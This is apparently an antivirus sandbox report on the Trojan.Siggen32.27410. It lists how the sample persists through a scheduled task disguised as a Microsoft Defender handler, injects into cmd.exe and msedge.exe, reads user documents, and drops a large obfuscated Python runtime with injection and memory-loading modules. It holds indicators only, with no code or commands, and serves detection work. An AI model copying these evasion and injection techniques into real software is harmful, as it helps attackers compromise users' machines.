Trojan.Siggen32.27410

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\microsoft defender threat intelligence handler

Malicious functions

Injects code into

the following system processes:

<SYSTEM32>\cmd.exe

the following user processes:

msedge.exe

Reads files which store third party applications passwords

%HOMEPATH%\desktop\508softwareandos.doc
%HOMEPATH%\desktop\glidescope_review_rev_010.docx
%HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
%HOMEPATH%\desktop\holycrosschurchinstructions.docx
%HOMEPATH%\desktop\nwfieldnotes1966.docx

Modifies file system

Creates the following files

%TEMP%\nwg134.tmp
%LOCALAPPDATA%\programs\python\python318\exec.py
%LOCALAPPDATA%\programs\python\python318\libcrypto-3.dll
%LOCALAPPDATA%\programs\python\python318\libffi-8.dll
%LOCALAPPDATA%\programs\python\python318\libssl-3.dll
%LOCALAPPDATA%\programs\python\python318\license.txt
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\pyarmor_runtime.pyd
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__init__.py
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pyexpat.pyd
%LOCALAPPDATA%\programs\python\python318\python.cat
%LOCALAPPDATA%\programs\python\python318\python.exe
%LOCALAPPDATA%\programs\python\python318\python3.dll
%LOCALAPPDATA%\programs\python\python318\python311.dll
%LOCALAPPDATA%\programs\python\python318\python311.zip
%LOCALAPPDATA%\programs\python\python318\python311._pth
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\oleaut32.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\ws2_32.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__init__.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\pefile.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__init__.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonw.exe
%LOCALAPPDATA%\programs\python\python318\select.pyd
%LOCALAPPDATA%\programs\python\python318\sqlite3.dll
%LOCALAPPDATA%\programs\python\python318\unicodedata.pyd
%LOCALAPPDATA%\programs\python\python318\vcruntime140.dll
%LOCALAPPDATA%\programs\python\python318\vcruntime140_1.dll
%LOCALAPPDATA%\programs\python\python318\windows\alpc.py
%LOCALAPPDATA%\programs\python\python318\windows\com.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\catalog.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\certificate.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\cryptmsg.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\dpapi.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\encrypt_decrypt.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\generation.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\sign_verify.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\dbgprint.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\breakpoints.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\debugger.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\localdbg.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\symboldbg.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\symbols.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\auto_doc_tst.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\flag.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\interfaces.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\meta.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\ntstatus.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\windef.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winerror.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winfuncs.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winstructs.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\hooks.py
%LOCALAPPDATA%\programs\python\python318\windows\injection.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\cpuid.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\nativeutils.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\native_function.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\simple_x64.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\simple_x86.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\pe_parse.py
%LOCALAPPDATA%\programs\python\python318\windows\pipe.py
%LOCALAPPDATA%\programs\python\python318\windows\pycompat.py
%LOCALAPPDATA%\programs\python\python318\windows\remotectypes.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\client.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\epmapper.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\ndr.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\security.py
%LOCALAPPDATA%\programs\python\python318\windows\syswow64.py
%LOCALAPPDATA%\programs\python\python318\windows\test.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\improved_buffer.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\pythonutils.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\winutils.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\apisetmap.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\bits.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\device_manager.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\event_log.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\event_trace.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\exception.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\file.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\handle.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\network.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\object_manager.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\process.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\registry.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\service.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\system.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\system_module.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\task_scheduler.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\token.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\volume.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\wmi.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apiproxy.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\advapi32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\cfgmgr32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\crypt32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\cryptui.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\dbghelp.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\dnsapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\iphlpapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\kernel32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ktmw32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\netapi32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ntdll.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ole32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\oleacc.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\oleaut32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\psapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\setupapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\shell32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\shlwapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\tdh.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\user32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\version.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\virtdisk.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wevtapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\winhttp.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wininet.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wintrust.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ws2_32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\error.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\wintrust.py
%LOCALAPPDATA%\programs\python\python318\windows\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\winsound.pyd
%LOCALAPPDATA%\programs\python\python318\_asyncio.pyd
%LOCALAPPDATA%\programs\python\python318\_bz2.pyd
%LOCALAPPDATA%\programs\python\python318\_ctypes.pyd
%LOCALAPPDATA%\programs\python\python318\_decimal.pyd
%LOCALAPPDATA%\programs\python\python318\_elementtree.pyd
%LOCALAPPDATA%\programs\python\python318\_hashlib.pyd
%LOCALAPPDATA%\programs\python\python318\_lzma.pyd
%LOCALAPPDATA%\programs\python\python318\_msi.pyd
%LOCALAPPDATA%\programs\python\python318\_multiprocessing.pyd
%LOCALAPPDATA%\programs\python\python318\_overlapped.pyd
%LOCALAPPDATA%\programs\python\python318\_queue.pyd
%LOCALAPPDATA%\programs\python\python318\_socket.pyd
%LOCALAPPDATA%\programs\python\python318\_sqlite3.pyd
%LOCALAPPDATA%\programs\python\python318\_ssl.pyd
%LOCALAPPDATA%\programs\python\python318\_uuid.pyd
%LOCALAPPDATA%\programs\python\python318\_zoneinfo.pyd
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc.2012676327536
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-311.pyc.2012677613936
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-311.pyc.2012677613456
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-311.pyc.2012709458096
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-311.pyc.2012709458624
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-311.pyc.2012709458448
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-311.pyc.2012723993200
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-311.pyc.2012723996880
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-311.pyc.2012723998480
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-311.pyc.2012709461088
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-311.pyc.2012723999920
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-311.pyc.2012725549520
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-311.pyc.2012709462144
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-311.pyc.2012709461440
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-311.pyc.2012709463024
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-311.pyc.2012725773040
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-311.pyc.2012725778144
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-311.pyc.2012723999280
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-311.pyc.2012725759152
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-311.pyc.2012709469008
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-311.pyc.2012676333344
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-311.pyc.2012725788176
